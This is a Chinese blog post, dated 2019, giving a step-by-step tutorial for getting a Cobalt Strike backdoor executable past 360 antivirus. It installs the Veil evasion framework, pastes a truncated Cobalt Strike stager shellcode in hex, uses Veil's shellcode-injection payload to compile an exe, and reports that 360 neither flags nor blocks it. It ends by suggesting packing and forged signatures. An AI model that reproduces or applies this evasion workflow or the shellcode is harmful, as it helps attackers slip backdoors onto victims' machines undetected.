如何轻松bypass 360

发布 : 2019-09-16 分类 : 技术文章 浏览 :

0X01 和360硬刚 (卒)

首先直接使用cs生成常规exe后门程序,放到装到装有360杀毒和360安全卫士的靶机,直接被秒杀

n4YWF0.png

0X02 使用veil bypass 360

veil是一款免杀框架,是专门为msf做免杀的,当然现在也支持cobalt strike。

kali可以通过以下命令快速安装:

1
2
apt -y install veil
/usr/share/veil/config/setup.sh --force --silent

更多请参考github

在cobalt strike上生成veil 的payload

n4YfYV.png

生成的是16进制的shellcode,后面会用到:

1
\x8b\x12\xeb\x86\x5d\x68\x6e\x65\x74\x00\x68\x77\x69\x6e\x69\x54\x68\x4c\x77\x26\x07\xff\xd5\x31\xff\x57\x57\x57\x57\x57\x68\x3a\x56\x79\xa7\xff\xd5\xe9\x84\x00\x00\x00\x5b\x31\xc9\x51\x51\x6a\x03\x51\x51\x68\x50\x00\x00\x00\x53\x50\x68\x57\x89\x9f\xc6\xff\xd5\xeb\x70\x5b\x31\xd2\x52\x68\x00\x02\x40\x84\x52\x52\x52\x53\x52\x50\x68\xeb\x55\x2e\x3b\xff\xd5\x89\xc6\x83\xc3\x50\x31\xff\x57\x57\x6a\xff\x53\x56\x68\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x84\xc3\x01\x00\x00\x31\xff\x85\xf6\x74\x04\x89\xf9\xeb\x09\x68\xaa\xc5\xe2\x5d\xff\xd5\x89\xc1\x68\x45\x21\x5e\x31\xff\xd5\x31\xff\x57\x6a\x07\x51\x56\x50\x68\xb7\x57\xe0\x0b\xff\xd5\xbf\x00\x2f\x00\x00\x39\xc7\x74\xb7\x31\xff\xe9\x91\x01\x00\x00\xe9\xc9\x01\x00\x00\xe8\x8b\xff\xff\xff\x2f\x6a\x71\x75\x65\x72\x79\x2d\x33\x2e\x33\x2e\x31\x2e\x73\x6c\x69\x6d\x2e\x6d\x69\x6e\x2e\x6a\x73\x00\x55\x66\x3c\x1f\xb9\x5a\x59\xfb\x73\x60\x5f\x38\xe0\x67\x27\x58\xc8\x2d\xc8\xf2\xe0\x9d\xd4\x7a\xd6\x75\x1f\xdf\x38\x0a\x15\x39\x32\x9c\xcd\x2a.........

在kali里面打开veil,

n5FYJP.png

目前可用的工具有两个,这里我们选用1,命令如下:

1
use 1

n5AzGt.png

共有41个payload,可以使用list来查看所有payload:

1
list

n4Y5SU.png

注:针对CS只能使用shellcode_inject的payload

这里我们选用17:

1
use 17

n4Yoy4.png

可以使用set 对options各选项进行设置,这里直接使用generate来加载payload:

n5eXOf.png

然后输入3使用自定义的shellcode,将刚才CS生成的payload.txt里面的shellcode复制到此处,然后回车,这里会让你为输出文件定义一个名字,然后回车(若直接回车将使用默认名字“payload”。)将会自动对shellcode进行编译病生成exe文件

n4YbwR.png

可以到相应目录将生成的文件复制到别处。

测试是否免杀

先使用360安全卫士和360杀毒各自进行静态检测:
n4YIlF.png

n4YTOJ.png

运行程序看360是否会拦截:

n4YHm9.png

一些废话

如果对编译后的exe还不放心,还可以进一步对其进行加壳、替换资源文件、签名伪造等。

留下足迹